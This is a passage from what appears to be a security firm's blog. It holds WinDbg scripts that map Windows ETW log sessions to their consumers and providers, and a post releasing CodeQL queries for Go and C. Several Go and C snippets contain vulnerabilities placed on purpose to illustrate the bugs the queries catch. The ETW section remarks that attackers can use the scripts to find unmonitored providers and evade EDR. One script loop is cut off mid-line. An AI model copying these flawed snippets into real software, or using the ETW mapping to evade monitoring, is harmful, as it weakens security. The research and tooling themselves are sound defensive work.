Process Dell.TechHub.Instrumentation.SubAgent.exe with ID 0x25c4 has handle 0xf54 to Logger ID 44
Process SgrmBroker.exe with ID 0x17b8 has handle 0x178 to Logger ID 15
Process SystemInformer.exe with ID 0x4304 has handle 0x30c to Logger ID 16
Process PerfWatson2.exe with ID 0xa60 has handle 0xa3c to Logger ID 46
Process PerfWatson2.exe with ID 0x81a4 has handle 0x9c4 to Logger ID 40
Process PerfWatson2.exe with ID 0x76f0 has handle 0x9a8 to Logger ID 47
Process operfmon.exe with ID 0x3388 has handle 0x88c to Logger ID 48
Process operfmon.exe with ID 0x3388 has handle 0x8f4 to Logger ID 49

While we still don’t get the name of the log sessions, we already have more data than we did in user mode. We can see, for example, that some processes have multiple consumer handles since they are subscribed to multiple log sessions. Unfortunately, the ETW_REALTIME_CONSUMER structure doesn’t have any information about the log session besides its identifier, so we must find a way to match identifiers to human-readable names.

The registered loggers and their IDs are stored in a global list of loggers (or at least they were until the introduction of server silos; now, every isolated process will have its own separate ETW loggers while non-isolated processes will use the global list, which I will also use in this post). The global list is stored inside an ETW_SILODRIVERSTATE structure within the host silo globals, nt!PspHostSiloGlobals:

dx ((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState
((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState                 : 0xffffe38f3deeb000 [Type: _ETW_SILODRIVERSTATE *]
    [+0x000] Silo             : 0x0 [Type: _EJOB *]
    [+0x008] SiloGlobals      : 0xfffff8052bd489c0 [Type: _ESERVERSILO_GLOBALS *]
    [+0x010] MaxLoggers       : 0x50 [Type: unsigned long]
    [+0x018] EtwpSecurityProviderGuidEntry [Type: _ETW_GUID_ENTRY]
    [+0x1c0] EtwpLoggerRundown : 0xffffe38f3deca040 [Type: _EX_RUNDOWN_REF_CACHE_AWARE * *]
    [+0x1c8] EtwpLoggerContext : 0xffffe38f3deca2c0 [Type: _WMI_LOGGER_CONTEXT * *]
    [+0x1d0] EtwpGuidHashTable [Type: _ETW_HASH_BUCKET [64]]
    [+0xfd0] EtwpSecurityLoggers [Type: unsigned short [8]]
    [+0xfe0] EtwpSecurityProviderEnableMask : 0x3 [Type: unsigned char]
    [+0xfe4] EtwpShutdownInProgress : 0 [Type: long]
    [+0xfe8] EtwpSecurityProviderPID : 0x798 [Type: unsigned long]
    [+0xff0] PrivHandleDemuxTable [Type: _ETW_PRIV_HANDLE_DEMUX_TABLE]
    [+0x1010] RTBacklogFileRoot : 0x0 [Type: wchar_t *]
    [+0x1018] EtwpCounters     [Type: _ETW_COUNTERS]
    [+0x1028] LogfileBytesWritten : {4391651513} [Type: _LARGE_INTEGER]
    [+0x1030] ProcessorBlocks  : 0x0 [Type: _ETW_SILO_TRACING_BLOCK *]
    [+0x1038] ContainerStateWnfSubscription : 0xffffaf8de0386130 [Type: _EX_WNF_SUBSCRIPTION *]
    [+0x1040] ContainerStateWnfCallbackCalled : 0x0 [Type: unsigned long]
    [+0x1048] UnsubscribeWorkItem : 0xffffaf8de0202170 [Type: _WORK_QUEUE_ITEM *]
    [+0x1050] PartitionId      : {00000000-0000-0000-0000-000000000000} [Type: _GUID]
    [+0x1060] ParentId         : {00000000-0000-0000-0000-000000000000} [Type: _GUID]
    [+0x1070] QpcOffsetFromRoot : {0} [Type: _LARGE_INTEGER]
    [+0x1078] PartitionName    : 0x0 [Type: char *]
    [+0x1080] PartitionNameSize : 0x0 [Type: unsigned short]
    [+0x1082] UnusedPadding    : 0x0 [Type: unsigned short]
    [+0x1084] PartitionType    : 0x0 [Type: unsigned long]
    [+0x1088] SystemLoggerSettings [Type: _ETW_SYSTEM_LOGGER_SETTINGS]
    [+0x1200] EtwpStartTraceMutex [Type: _KMUTANT]

The EtwpLoggerContext field points to an array of pointers to WMI_LOGGER_CONTEXT structures, each describing one logger session. The size of the array is saved in the MaxLoggers field of the ETW_SILODRIVERSTATE. Not all entries of the array are necessarily used; unused entries will be set to 1. Knowing this, we can dump all of the initialized entries of the array. (I’ve hard coded the array size for convenience):

dx ((nt!_WMI_LOGGER_CONTEXT*(*)[0x50])(((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState->EtwpLoggerContext))->Where(l => l != 1)
((nt!_WMI_LOGGER_CONTEXT*(*)[0x50])(((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState->EtwpLoggerContext))->Where(l => l != 1)                
    [2]              : 0xffffe38f3f0c9040 [Type: _WMI_LOGGER_CONTEXT *]
    [3]              : 0xffffe38f3fe07640 [Type: _WMI_LOGGER_CONTEXT *]
    [4]              : 0xffffe38f3f0c75c0 [Type: _WMI_LOGGER_CONTEXT *]
    [5]              : 0xffffe38f3f0c9780 [Type: _WMI_LOGGER_CONTEXT *]
    [6]              : 0xffffe38f3f0cb040 [Type: _WMI_LOGGER_CONTEXT *]
    [7]              : 0xffffe38f3f0cb600 [Type: _WMI_LOGGER_CONTEXT *]
    [8]              : 0xffffe38f3f0ce040 [Type: _WMI_LOGGER_CONTEXT *]
    [9]              : 0xffffe38f3f0ce600 [Type: _WMI_LOGGER_CONTEXT *]
    [10]             : 0xffffe38f79832a40 [Type: _WMI_LOGGER_CONTEXT *]
    [11]             : 0xffffe38f3f0d1640 [Type: _WMI_LOGGER_CONTEXT *]
    [12]             : 0xffffe38f89535a00 [Type: _WMI_LOGGER_CONTEXT *]
    [13]             : 0xffffe38f3dacc940 [Type: _WMI_LOGGER_CONTEXT *]
    [14]             : 0xffffe38f3fe04040 [Type: _WMI_LOGGER_CONTEXT *]
       …

Each logger context contains information about the logger session such as its name, the file that stores the events, the security descriptor, and more. Each structure also contains a logger ID, which matches the index of the logger in the array we just dumped. So given a logger ID, we can find its details like this:

dx (((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState->EtwpLoggerContext)[@$loggerId]
 (((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState->EtwpLoggerContext)[@$loggerId]                 : 0xffffe38f3f0ce600 [Type: _WMI_LOGGER_CONTEXT *]
    [+0x000] LoggerId         : 0x9 [Type: unsigned long]
    [+0x004] BufferSize       : 0x10000 [Type: unsigned long]
    [+0x008] MaximumEventSize : 0xffb8 [Type: unsigned long]
    [+0x00c] LoggerMode       : 0x19800180 [Type: unsigned long]
    [+0x010] AcceptNewEvents  : 0 [Type: long]
    [+0x018] GetCpuClock      : 0x0 [Type: unsigned __int64]
    [+0x020] LoggerThread     : 0xffffe38f3f0d0040 [Type: _ETHREAD *]
    [+0x028] LoggerStatus     : 0 [Type: long]
       …

Now we can implement this as a function (in DX or JavaScript) and print the logger name for each open consumer handle we find:

dx @$cursession.Processes.Select(p => @$scriptContents.EtwConsumersForProcess(p))
@$cursession.Processes.Select(p => @$scriptContents.EtwConsumersForProcess(p))                
Process svchost.exe with ID 0x558 has handle 0x7cc to Logger ID 31
    Logger Name: "UBPM"

Process svchost.exe with ID 0x114c has handle 0x40c to Logger ID 36
    Logger Name: "WFP-IPsec Diagnostics"

Process svchost.exe with ID 0x11f8 has handle 0x2d8 to Logger ID 17
    Logger Name: "EventLog-System"

Process svchost.exe with ID 0x11f8 has handle 0x2e8 to Logger ID 3
    Logger Name: "Eventlog-Security"

Process svchost.exe with ID 0x11f8 has handle 0x2f4 to Logger ID 9
    Logger Name: "EventLog-Application"

Process NVDisplay.Container.exe with ID 0x1478 has handle 0x890 to Logger ID 38
    Logger Name: "NOCAT"

Process svchost.exe with ID 0x1cec has handle 0x1dc to Logger ID 7
    Logger Name: "DiagLog"

Process svchost.exe with ID 0x1d2c has handle 0x780 to Logger ID 8
    Logger Name: "Diagtrack-Listener"

Process CSFalconService.exe with ID 0x1e54 has handle 0x760 to Logger ID 3
    Logger Name: "Eventlog-Security"
...

In fact, by using the logger array, we can build a better way to enumerate ETW log session consumers. Each logger context has a Consumers field, which is a linked list connecting all of the ETW_REALTIME_CONSUMER structures that are subscribed to this log session:

So instead of scanning the handle table of each and every process in the system, we can go directly to the loggers array and find the registered processes for each one:

function EtwLoggersWithConsumerProcesses()
{
    let dbgOutput = host.diagnostics.debugLog;
    let hostSiloGlobals = host.getModuleSymbolAddress("nt", "PspHostSiloGlobals");
    let typedhostSiloGlobals = host.createTypedObject(hostSiloGlobals, "nt", "_ESERVERSILO_GLOBALS");

    let maxLoggers = typedhostSiloGlobals.EtwSiloState.MaxLoggers;
    for (let i = 0; i 

Calling this function should get us the exact same results as earlier, only much faster!

After getting this part, we can continue to search for another piece of information that could be useful—the list of GUIDs that provide events to a log session.

Finding provider GUIDs

Finding the consumers of an ETW log session is only half the battle—we also want to know which providers notify each log session. We saw earlier that we can get that information from Performance Monitor, but let’s see how we can also get it from a debugger session, as it might be useful when the live machine isn’t available or when looking for details that aren’t supplied by user-mode tools like Performance Monitor.

If we look at the WMI_LOGGER_CONTEXT structure, we won’t see any details about the providers that notify the log session. To find this information, we need to go back to the ETW_SILODRIVERSTATE structure from earlier and look at the EtwpGuidHashTable field. This is an array of buckets storing all of the registered provider GUIDs. For performance reasons, the GUIDs are hashed and stored in 64 buckets. Each bucket contains three lists linking ETW_GUID_ENTRY structures. There is one list for each ETW_GUID_TYPE:

  • EtwpTraceGuidType
  • EtwpNotificationGuidType
  • EtwpGroupGuidType

Each ETW_GUID_ENTRY structure contains an EnableInfo array with eight entries, and each contains information about one log session that the GUID is providing events for (which means that an event GUID entry can supply events for up to eight different log sessions):

dt nt!_ETW_GUID_ENTRY EnableInfo.
   +0x080 EnableInfo  : [8] 
      +0x000 IsEnabled   : Uint4B
      +0x004 Level       : UChar
      +0x005 Reserved1   : UChar
      +0x006 LoggerId    : Uint2B
      +0x008 EnableProperty : Uint4B
      +0x00c Reserved2   : Uint4B
      +0x010 MatchAnyKeyword : Uint8B
      +0x018 MatchAllKeyword : Uint8B

Visually, this is what this whole thing looks like:

As we can see, the ETW_GUID_ENTRY structure contains a LoggerId field, which we can use as the index into the EtwpLoggerContext array to find the log session.

With this new information in mind, we can write a simple JavaScript function to print the GUIDs that match a logger ID. (In this case, I chose to go over only one ETW_GUID_TYPE at a time to make this code a bit cleaner.) Then we can go one step further and parse the ETW_REG_ENTRY list in each GUID entry to find out which processes notify it, or if it’s a kernel-mode provider:

function GetGuidsForLoggerId(loggerId, guidType)
{
    let dbgOutput = host.diagnostics.debugLog;

    let hostSiloGlobals = host.getModuleSymbolAddress("nt", "PspHostSiloGlobals");
    let typedhostSiloGlobals = host.createTypedObject(hostSiloGlobals, "nt", "_ESERVERSILO_GLOBALS");
    let guidHashTable = typedhostSiloGlobals.EtwSiloState.EtwpGuidHashTable;
    for (let bucket of guidHashTable)
    {
        let guidEntries = host.namespace.Debugger.Utility.Collections.FromListEntry(bucket.ListHead[guidType], "nt!_ETW_GUID_ENTRY", "GuidList");
        if (guidEntries.Count() != 0)
        {
            for (let guid of guidEntries)
            {
                for (let enableInfo of guid.EnableInfo)
                {
                    if (enableInfo.LoggerId === loggerId)
                    {
                        dbgOutput("\tGuid: ", guid.Guid, "\n");
                        let regEntryLinkField = "RegList";
                        if (guidType == 2)
                        {
                            // group GUIDs registration entries are linked through the GroupRegList field
                            regEntryLinkField = "GroupRegList";
                        }
                        let regEntries = host.namespace.Debugger.Utility.Collections.FromListEntry(guid.RegListHead, "nt!_ETW_REG_ENTRY", regEntryLinkField);
                        if (regEntries.Count() != 0)
                        {
                            dbgOutput("\tProvider Processes:\n");
                            for (let regEntry of regEntries)
                            {
                                if (regEntry.DbgUserRegistration != 0)
                                {
                                    dbgOutput("\t\tProcess: ", regEntry.Process.SeAuditProcessCreationInfo.ImageFileName.Name, " ID: ", host.parseInt64(regEntry.Process.UniqueProcessId.address, 16).toString(10), "\n");
                                }
                                else
                                {
                                    dbgOutput("\t\tKernel Provider\n");
                                }
                            }
                        }
                        break;
                    }
                }
            }
        }
    }
}

As an example, here are all of the trace provider GUIDs and the processes that notify them for ETW session UBPM (LoggerId 31 in my case):

dx @$scriptContents.GetGuidsForLoggerId(31, 0)
    Guid: {9E03F75A-BCBE-428A-8F3C-D46F2A444935}
    Provider Processes:
        Process: "\Device\HarddiskVolume3\Windows\System32\svchost.exe" ID: 2816
    Guid: {2D7904D8-5C90-4209-BA6A-4C08F409934C}
    Guid: {E46EEAD8-0C54-4489-9898-8FA79D059E0E}
    Provider Processes:
        Process: "\Device\HarddiskVolume3\Windows\System32\dwm.exe" ID: 2268
    Guid: {D02A9C27-79B8-40D6-9B97-CF3F8B7B5D60}
    Guid: {92AAB24D-D9A9-4A60-9F94-201FED3E3E88}
    Provider Processes:
        Process: "\Device\HarddiskVolume3\Windows\System32\svchost.exe" ID: 2100
        Kernel Provider
    Guid: {FBCFAC3F-8460-419F-8E48-1F0B49CDB85E}
    Guid: {199FE037-2B82-40A9-82AC-E1D46C792B99}
    Provider Processes:
        Process: "\Device\HarddiskVolume3\Windows\System32\lsass.exe" ID: 1944
    Guid: {BD2F4252-5E1E-49FC-9A30-F3978AD89EE2}
    Provider Processes:
        Process: "\Device\HarddiskVolume3\Windows\System32\svchost.exe" ID: 16292
    Guid: {22B6D684-FA63-4578-87C9-EFFCBE6643C7}
    Guid: {3635D4B6-77E3-4375-8124-D545B7149337}
    Guid: {0621B9DF-3249-4559-9889-21F76B5C80F3}
    Guid: {BD8FEA17-5549-4B49-AA03-1981D16396A9}
    Guid: {F5528ADA-BE5F-4F14-8AEF-A95DE7281161}
    Guid: {54732EE5-61CA-4727-9DA1-10BE5A4F773D}
    Provider Processes:
        Process: "\Device\HarddiskVolume3\Windows\System32\svchost.exe" ID: 4428
    Guid: {18F4A5FD-FD3B-40A5-8FC2-E5D261C5D02E}
    Guid: {8E6A5303-A4CE-498F-AFDB-E03A8A82B077}
    Provider Processes:
        Kernel Provider
    Guid: {CE20D1C3-A247-4C41-BCB8-3C7F52C8B805}
    Provider Processes:
        Kernel Provider
    Guid: {5EF81E80-CA64-475B-B469-485DBC993FE2}
    Guid: {9B307223-4E4D-4BF5-9BE8-995CD8E7420B}
    Provider Processes:
        Kernel Provider
    Guid: {AA1F73E8-15FD-45D2-ABFD-E7F64F78EB11}
    Provider Processes:
        Kernel Provider
    Guid: {E1BDC95E-0F07-5469-8E64-061EA5BE6A0D}
    Guid: {5B004607-1087-4F16-B10E-979685A8D131}
    Guid: {AEDD909F-41C6-401A-9E41-DFC33006AF5D}
    Guid: {277C9237-51D8-5C1C-B089-F02C683E5BA7}
    Provider Processes:
        Kernel Provider
    Guid: {F230D19A-5D93-47D9-A83F-53829EDFB8DF}
    Provider Processes:
        Process: "\Device\HarddiskVolume3\Windows\System32\svchost.exe" ID: 2816

Putting all of those steps together, we finally have a way to know which log sessions are running on the machine, which processes notify each of the GUIDs in the session, and which processes are subscribed to them. This can help us understand the purpose of different ETW log sessions running on the machine, such as identifying the log sessions used by EDR software or interesting hardware components. These scripts can also be modified as needed to identify ETW irregularities, such as a log session that has been disabled in order to blind security products. From an attacker perspective, gathering this information can tell us which ETW providers are used on a machine and which ones are ignored and, therefore, don’t present us with any risk of detection.

Overall, ETW is a very powerful mechanism, so getting more visibility into its internal workings is useful for attackers and defenders alike. This post only scratches the surface, and there’s so much more work that can be done in this area.

All of the JavaScript functions shown in this post can be found in this GitHub repo.

Publishing Trail of Bits’ CodeQL queries

6 December 2023 at 13:30

By Paweł Płatek

We are publishing a set of custom CodeQL queries for Go and C. We have used them to find critical issues that the standard CodeQL queries would have missed. This new release of a continuously updated repository of CodeQL queries joins our public Semgrep rules and Automated Testing Handbook in an effort to share our technical expertise with the community.

For the initial release of our internal CodeQL queries, we focused on issues like misused cryptography, insecure file permissions, and bugs in string methods:

Language Query name Vulnerability description
Go Message not hashed before signature verification This query detects calls to (EC)DSA APIs with a message that was not hashed. If the message is longer than the expected hash digest size, it is silently truncated.
Go File permission flaws This query finds non-octal (e.g., 755 vs 0o755) and unsupported (e.g., 04666) literals used as a filesystem permission parameter (FileMode).
Go Trim functions misuse This query finds calls to string.{Trim,TrimLeft,TrimRight} with the second argument not being a cutset but a continuous substring to be trimmed.
Go Missing MinVersion in tls.Config This query finds cases when you do not set the tls.Config.MinVersion explicitly for servers. By default, version 1.0 is used, which is considered insecure. This query does not mark explicitly set insecure versions.
C CStrNFinder This query finds calls to functions that take a string and its size as separate arguments (e.g., strncmp, strncat) but the size argument is wrong.
C Missing null terminator This query finds incorrectly initialized strings that are passed to functions expecting null-byte-terminated strings.

CodeQL 101

CodeQL is the static analysis tool powering GitHub Advanced Security and is widely used throughout the community to discover vulnerabilities. CodeQL operates by transforming the code being tested into a database that is queryable using a Datalog-like language. While the core engine of CodeQL remains proprietary and closed source, the tool offers open-source libraries implementing various analyses and sets of security queries.

To test our queries, install the CodeQL CLI by following the official documentation. Once the CodeQL CLI is ready, download Trail of Bits’ query packs and check whether the new queries are detected:

codeql pack download trailofbits/{cpp,go}-queries
codeql resolve qlpacks | grep trailofbits

Now go to your project’s root directory and generate a CodeQL database, specifying either go or cpp as the programming language:

codeql database create codeql.db --language go

If the generation hasn’t succeeded or the project has a complex build system, use the command flag. Finally, execute Trail of Bits’ queries against the database:

codeql database analyze database.db --format=sarif-latest --output=./tob.sarif -- trailofbits/go-queries

Output of the analysis is in the Static Analysis Results Interchange Format (SARIF). Use Visual Studio Code with SARIF Viewer plugin to open it and triage findings. Alternatively, upload results to GitHub or use --format csv to get results in text form.

(EC)DSA silent input truncation in Go

Let’s sign the /etc/passwd file using ECDSA. Is the following implementation secure?

func main() {
    privateKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
    if err != nil { panic(err) }

    data, err := os.ReadFile("/etc/passwd")
    if err != nil { panic(err) }

    sig, err := ecdsa.SignASN1(rand.Reader, privateKey, data)
    if err != nil { panic(err) }
    fmt.Printf("signature: %x\n", sig)

    valid := ecdsa.VerifyASN1(&privateKey.PublicKey, data, sig)
    fmt.Println("signature verified:", valid)
}

Figure 1: An example signature generation and verification function

Of course it isn’t. The issue lies in passing raw, unhashed, and potentially long data to the ecdsa.SignASN1 and ecdsa.VerifyASN1 methods, while the Go crypto/ecdsa package (and a few other packages) expects data for signing and verification to be a hash of the actual data.

This behavior means that the code signs and verifies only the first 32 bytes of the file, as the size of the P-256 curve used in the example is 32 bytes.

The silent truncation of input data occurs in the hashToNat method, which is used internally by the ecdsa.{SignASN1,VerifyASN1} methods:

// hashToNat sets e to the left-most bits of hash, according to
// SEC 1, Section 4.1.3, point 5 and Section 4.1.4, point 3.
func hashToNat[Point nistPoint[Point]](c *nistCurve[Point], e *bigmod.Nat, hash []byte) {
    // ECDSA asks us to take the left-most log2(N) bits of hash, and use them as
    // an integer modulo N. This is the absolute worst of all worlds: we still
    // have to reduce, because the result might still overflow N, but to take
    // the left-most bits for P-521 we have to do a right shift.
    if size := c.N.Size(); len(hash) > size {
        hash = hash[:size]

Figure 2: The silent truncation of input data (crypto/ecdsa/ecdsa.go)

We have seen this vulnerability in real-world codebases and the impact was critical. To address the issue, there are a couple of approaches:

  1. Length validation. A simple approach to prevent the lack-of-hashing issues is to validate the length of the provided data, as done in the go-ethereum library.
    func VerifySignature(pubkey, msg, signature []byte) bool {
        if len(msg) != 32 || len(signature) != 64 || len(pubkey) == 0 {
            return false
        }

    Figure 3: Validation function from the go-ethereum library
    (go-ethereum/crypto/secp256k1/secp256.go#126–129)

  2. Static detection. Another approach is to statically detect the lack of hashing. For this purpose, we developed the tob/go/msg-not-hashed-sig-verify query, which detects all data flows to potentially problematic methods, ignoring flows that initiate from or go through a hashing function or slicing operation.

    An interesting problem we had to solve was how to set starting points (sources) for the data flow analysis? We could have used the UntrustedFlowSource class for that purpose. Then the analysis would be finding flows from any input potentially controlled by an attacker. However, UntrustedFlowSource often needs to be extended per project to be useful, so using it for our analysis would result in a lot of flows missed for a lot of projects. Therefore, our query focuses on finding the longest data flows, which are more likely to indicate potential vulnerabilities.

File permissions flaws in Go

Can you spot a bug in the code below?

if err := os.Chmod(“./secret_key”, 400); err != nil {
    return
}

Figure 4: Buggy Go code

Okay, so file permissions are usually represented as octal integers. In our case, the secret key file would end up with the permission set to 0o620 (or rw--w----), allowing non-owners to modify the file. The integer literal used in the call to the os.Chmod method is—most probably—not the one that a developer wanted to use.

To find unexpected integer values used as FileModes, we implemented a WYSIWYG (“what you see is what you get”) heuristic in the tob/go/file-perms-flaws CodeQL query. The “what you see” is a cleaned-up integer literal (a hard-coded number of the FileMode type)—with removed underscores, a removed base prefix, and left-padded zeros. The “what you get” is the same integer converted to an octal representation. If these two parts are not equal, there may be a bug present.

// what you see
fileModeAsSeen = ("000" + fileModeLitStr.replaceAll("_", "").regexpCapture("(0o|0x|0b)?(.+)", 2)).regexpCapture("0*(.{3,})", 1)

// what you get
and fileModeAsOctal = octalFileMode(fileModeInt)

// what you see != what you get
and fileModeAsSeen != fileModeAsOctal

Figure 5: The WYSIWYG heuristic in CodeQL

To minimize false positives, we filter out numbers that are commonly used constants (like 0755 or 0644) but in decimal or hexadecimal form. These known, valid constants are explicitly defined in the isKnownValidConstant predicate. Here is how we implemented this predicate:

predicate isKnownValidConstant(string fileMode) {
  fileMode = ["365", "420", "436", "438", "511", "509", "493"]
  or
  fileMode = ["0x16d", "0x1a4", "0x1b4", "0x1b6", "0x1ff", "0x1fd", "0x1ed"]
}

Figure 6: The CodeQL predicate that filters out common file permission constants

Using non-octal representation of numbers isn’t the only possible pitfall when dealing with file permissions. Another issue to be aware of is the use of more than nine bits in calls to permission-changing methods. File permissions are encoded only as the first nine bits, and the other bits encode file modes such as sticky bit or setuid. Some permission changing methods—like os.Chmod or os.Mkdirignore a subset of the mode bits, depending on the operating system. The tob/go/file-perms-flaws query warns about this issue as well.

String trimming misuses in Go

API ambiguities are a common source of errors, especially when there are multiple methods with similar names and purposes accepting the same set of arguments. This is the case for Go’s strings.Trim family of methods. Consider the following calls:

strings.TrimLeft("file://FinnAndHengest", "file://")
strings.TrimPrefix("file://FinnAndHengest", "file://")

Figure 7: Ambiguous Trim methods

Can you tell the difference between these calls and determine which one works “as expected”?

According to the documentation, the strings.TrimLeft method accepts a cutset (i.e., a set of characters) for removal, rather than a prefix. Consequently, it deletes more characters than one would expect. While the above example may seem innocent, a bug in a cross-site scripting (XSS) sanitization function, for example, could have devastating consequences.

When looking for misused strings.Trim{Left,Right} calls, the tricky part is defining what qualifies as “expected” behavior. To address this challenge, we developed the tob/go/trim-misuse CodeQL query with simple heuristics to differentiate between valid and possibly mistaken calls, based on the cutset argument. We consider a Trim operation invalid if the argument contains repeated characters or meets all of the following conditions:

  • Is longer than two characters
  • Contains at least two consecutive alphanumeric characters
  • Is not a common list of continuous characters

While the heuristics look oversimplified, they worked well enough in our audits. In CodeQL, the above rules are implemented as shown below. The cutset is a variable corresponding to the cutset argument of a strings.Trim{Left,Right} method call.

// repeated characters imply the bug
cutset.length() != unique(string c | c = cutset.charAt(_) | c).length()

or
(
// long strings are considered suspicious
cutset.length() > 2

// at least one alphanumeric
and exists(cutset.regexpFind("[a-zA-Z0-9]{2}", _, _))

// exclude probable false-positives
and not cutset.matches("%1234567%")
and not cutset.matches("%abcdefghijklmnopqrstuvwxyz%")
)

Figure 8: CodeQL implementation of heuristics for a Trim operation

Interestingly, misuses of the strings.Trim methods are so common that Go developers are considering deprecating and replacing the problematic functions.

Identifying missing minimum TLS version configurations in Go

When using static analysis tools, it’s important to know their limitations. The official go/insecure-tls CodeQL query finds TLS configurations that accept insecure (outdated) TLS versions (e.g., SSLv3, TLSv1.1). It accomplishes that task by comparing values provided to the configuration’s MinVersion and MaxVersion settings against a list of deprecated versions. However, the query does not warn about configurations that do not explicitly set the MinVersion.

Why should this be a concern? The reason is that the default MinVersion for servers is TLSv1.0. Therefore, in the example below, the official query would mark only server_explicit as insecurely configured, despite both servers using the same MinVersion.

server_explicit := &http.Server{
    TLSConfig: &tls.Config{MinVersion: tls.VersionTLS10}
}
server_default := &http.Server{TLSConfig: &tls.Config{}}

Figure 9: Explicit and default configuration of the MinVersion setting

The severity of this issue is rather low since the default MinVersion for clients is a secure TLSv1.2. Nevertheless, we filled the gap and developed the tob/go/missing-min-version-tls CodeQL query, which detects tls.Config structures without the MinVersion field explicitly set. The query skips reporting configurations used for clients and limits false positives by filtering out findings where the MinVersion is set after the structure initialization.

String bugs in C and C++

Building on top of the insightful cstrnfinder research conducted by one of my Trail of Bits colleagues, we developed the tob/cpp/cstrnfinder query. This query aims to identify invalid numeric constants provided to calls to functions that expect a string and its corresponding size as input—such as strncmp, strncpy, and memmove. We focused on detecting three erroneous cases:

  • Buffer underread. This occurs when the size argument (number 20 in the example below) is slightly smaller than the source string’s length:
    if (!strncmp(argv[1], "org/tob/test/SafeData", 20)) {
        puts("Secure");
    } else {
        puts("Not secure");
    }

    Figure 10: A buffer underread bug example

    Here, the length of the "org/tob/test/SafeData" string is 21 bytes (22 if we count the terminating null byte). However, we are comparing only the first 20 bytes. Therefore, a string like "org/tob/test/SafeDatX" is incorrectly matched.

  • Buffer overread. This arises when the size argument (14 in the example below) is greater than the length of the input string, causing the function to read out of bounds.
    int check(const char *password) {
        const char pass[] = "Silmarillion";
        return memcmp(password, pass, 14);
    }

    Figure 11: A buffer overread bug example

    In the example, the length of the "Silmarillion" string is 12 bytes (13 with the null byte). If the password is longer than 13 bytes and starts with the "Silmarillion" substring, then the memcmp function reads data outside of the pass buffer. While functions operating on strings stop reading input buffers on a null byte and will not overread the input, the memcmp function operates on bytes and does not stop on null bytes.

  • Incorrect use of string concatenation function. If the size argument (BUFSIZE-1 in the example below) is greater than the source string’s length (the length of “, Beowulf\x00”, so 10 bytes), the size argument may be incorrectly interpreted as the destination buffer’s size (BUFSIZE bytes in the example), instead of the input string’s size. This may indicate a buffer overflow vulnerability.
    #define BUFSIZE 256
    
    char all_books[BUFSIZE];
    FILE *books_f = fopen("books.txt", "r");
    fgets(all_books, BUFSIZE, books_f);
    fclose(books_f);
    
    strncat(all_books, ", Beowulf", BUFSIZE-1);
    // safe version: strncat(all_books, ", Beowulf", BUFSIZE-strlen(dest)-1);

    Figure 12: A strncat function misuse bug example

    In the code above, the all_books buffer can hold a maximum 256 bytes of data. If the books.txt file contains 250 characters, then the remaining space in the buffer before the call to the strncat function is 6 bytes. However, we instruct the function to add up to 255 (BUFSIZE-1) bytes to the end of the all_books buffer. Therefore, a few bytes of the “, Beowulf” string will end up outside the allocated space. What we should do instead is instruct the strncat to add at most 5 bytes (leaving 1 byte for the terminating \x00).

    There is a similar built-in query with ID cpp/unsafe-strncat, but it doesn’t work with constant sizes.

Missing null terminator bug in C

Both C and C++ allow developers to construct fixed-size strings with an initialization literal. If the length of the literal is greater than or equal to the allocated buffer size, then the literal is truncated and the terminating null byte is not appended to the string.

char b1[18] = "The Road Goes Ever On";  // missing null byte, warning
char b2[13] = "Ancrene Wisse";  // missing null byte, NO WARNING
char b3[] = "Farmer Giles of Ham"; // correct initialization
char b4[3] = {'t', 'o', 'b'} // not a string, lack of null byte is expected

Figure 13: Example initializations of C strings

Interestingly, C compilers warn against initializers longer than the buffer size, but don’t raise alarms for initializers of a length equal to the buffer size—even though neither of the resulting strings are null-terminated. C++ compilers return errors for both cases.

The tob/cpp/no-null-terminator query uses data flow analysis to find incorrectly initialized strings passed to functions expecting a null-terminated string. Such function calls result in out-of-bounds read or write vulnerabilities.

CodeQL: past, present, and future

This will be a continuing project from Trail of Bits, so be on the lookout for more soon! One of our most valuable developments is our expertise in automated bug finding. This new CodeQL repository, the Semgrep rules, and the Automated Testing Handbook are key methods to helping others benefit from our work. Please use these resources and report any issues or improvements to them!

If you’d like to read more about our work on CodeQL, we have used its capabilities in several ways, such as detecting iterator invalidations, identifying unhandled errors, and uncovering divergent representations.

Contact us if you’re interested in customizing CodeQL queries for your project.

Say hello to the next chapter of the Testing Handbook!

11 December 2023 at 13:30

By Fredrik Dahlgren

Today we are announcing the latest addition to the Trail of Bits Testing Handbook: a brand new chapter on CodeQL! CodeQL is a powerful and versatile static analysis tool, and at Trail of Bits, we regularly use CodeQL on client engagements to find common vulnerabilities and to perform variant analysis for already identified weaknesses. However, we often hear from other developers and security professionals who struggle to get started with CodeQL. We’ve listened to the challenges that many face in writing custom CodeQL queries and integrating them into CI/CD. In response to this, we’ve tried to identify the major pain points shared across the community and write up guidance to help everyone get the most out of CodeQL.

In this latest addition to the Testing Handbook, we describe how to set up CodeQL locally and create a CodeQL database for your project. We’ll walk you through the process of writing and running custom queries and show you how to unit test and debug them. We’ll also guide you on integrating CodeQL into your existing CI/CD pipeline through GitHub code scanning. Finally, we’ve included a set of references to the official CodeQL documentation and third-party blog posts to help you find relevant, up-to-date information on all things CodeQL. Whether you’re an experienced CodeQL user or just getting started, our Testing Handbook is your entry point for harnessing the full power of CodeQL.

DARPA’s AI Cyber Challenge: We’re In!

14 December 2023 at 14:00

We’re thrilled to announce that Trail of Bits will be competing in DARPA’s upcoming AI Cyber Challenge (AIxCC)! DARPA is challenging competitors to develop novel, fully automated AI-driven systems capable of securing the critical software that underpins the modern world. We’ve formed a team of world class software security and AI/ML experts, bringing together researchers, engineers, analysts, and hackers from across our company, and have already started building our system.

Registration officially opened yesterday for the competition’s Open and Small Business Tracks. We’re planning to submit a proposal to the Small Business Track for an AI/ML-driven Cyber Reasoning System (CRS) that has been informed and shaped by our prior experience competing in DARPA’s Cyber Grand Challenge, supporting the UK Government’s Frontier AI Taskforce, and developing AI/ML-based security tools for DARPA and the US Navy.

